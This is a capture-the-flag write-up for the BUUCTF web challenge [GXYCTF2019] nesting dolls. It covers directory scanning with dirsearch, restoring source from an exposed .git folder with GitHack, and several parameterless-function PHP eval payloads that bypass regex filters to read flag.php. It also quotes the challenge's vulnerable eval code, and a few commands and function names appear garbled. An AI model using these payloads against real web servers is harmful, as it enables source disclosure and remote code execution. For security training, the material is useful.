Table of contents
source code acquisition
The web topic here is in buuctf: [GXYCTF2019] Matryoshka is prohibited
Open the page and view the source code, there is no point that can be used. Start a directory scan
The tool used here is dirsearch. Scanning the directory for direct access found that the status code was 429. The access was too fast and the website could not be accessed. Here, --delay is used for delay testing, and the directory of the .git file is successfully seen.
python dirsearch.py -u http://5a22cf65-2a27-4b1f-b2bc-9ba0d9b75721.node4.buuoj.cn:81/ --delay 10
It is determined here that there is githack, which is a .git leak exploit script, which rebuilds and restores the source code of the project through the files in the leaked .git folder.
lijiejie/GitHack: A `.git` folder disclosure exploit (github.com)
Read the introduction of giehack carefully here, this script must be run with python2
git clone https://github.com/lijiejie/GitHack/archive/refs/heads/master.zip
unzip GitHack-master.zip
cd GitHack-master
python2 GitHack.py http://5a22cf65-2a27-4b1f-b2bc-9ba0d9b75721.node4.buuoj.cn:81/.git/
function bypass
Let's take a look at the source code
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
// echo $_GET['exp'];
@eval($_GET['exp']);
}
else{
die("还差一点哦!");
}
}
else{
die("再好好想想!");
}
}
else{
die("还想读flag,臭弟弟!");
}
}
// highlight_file(__FILE__);
?>
A total of three if judgments need to be bypassed, the first layer filters pseudo-protocols, the second layer filters functions with parameters, and the third layer filters some functions
The special item (?R) in the regular expression provides this special usage of recursion, which is equivalent to matching the parameters of the function and setting the parameters of the function to empty, which can be called the verification of the function without parameters. And because it will be looped all the time, the final form should be a(b(c())) in the form of rce vulnerability without parameters.
No parameter rce generally consists of these functions:
getenv()
numberheaders()
get_defined_vars()
session_id()
dirname()&chdir()
Solution one:
First read what directories are there
Use the print_r function to print
?exp=print_r(scandir(current(localeconv())));
This sentence is equivalent to print_r(scandir("."));
exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));
highlight_file — syntax highlight a file (same as show_source)
next — advances the internal pointer in the array by one
array_reverse — Returns an array with elements in reverse order
scandir — list files and directories in a specified path
current — returns the current value in the array
localeconv — get number format information, return an array containing local number and currency format information
The loacleconv function will first return a '.' and then current will give us the value '.' of the current element in the array and return it to the payload we constructed so that scandir can return the array in the current directory, which is equivalent to scandir(".") , is to read the files in the current directory, array_reverse() outputs in reverse order (the purpose is to output the queried content in positive order), then next extracts the second element (discarding .), and finally prints with highlight_file() come out.
Use before /?exp=print_r(next(array_reverse(scandir(current(localeconv())))));
Read the file name of flag.php, use highlight_file to read.
can see the flag
Solution two:
The second way is to use session_id()
This method can be used because the above filtering function does not filter out the session_id, so I want to use session_id to obtain the flag, here we need to cooperate with session_start to open the session.
?exp=highlight_file(session_id(session_start()));
Catch the wave and write PHPSESSID=flag.php in the cookie to read the flag
Reference article:
No parameter rce reference from PHP Parametric Function RCE · sky's blog (skysec.top)
(1 message) buuctf-[GXYCTF2019] ban nesting dolls_qq_42728977's blog-CSDN blog_buuctf 429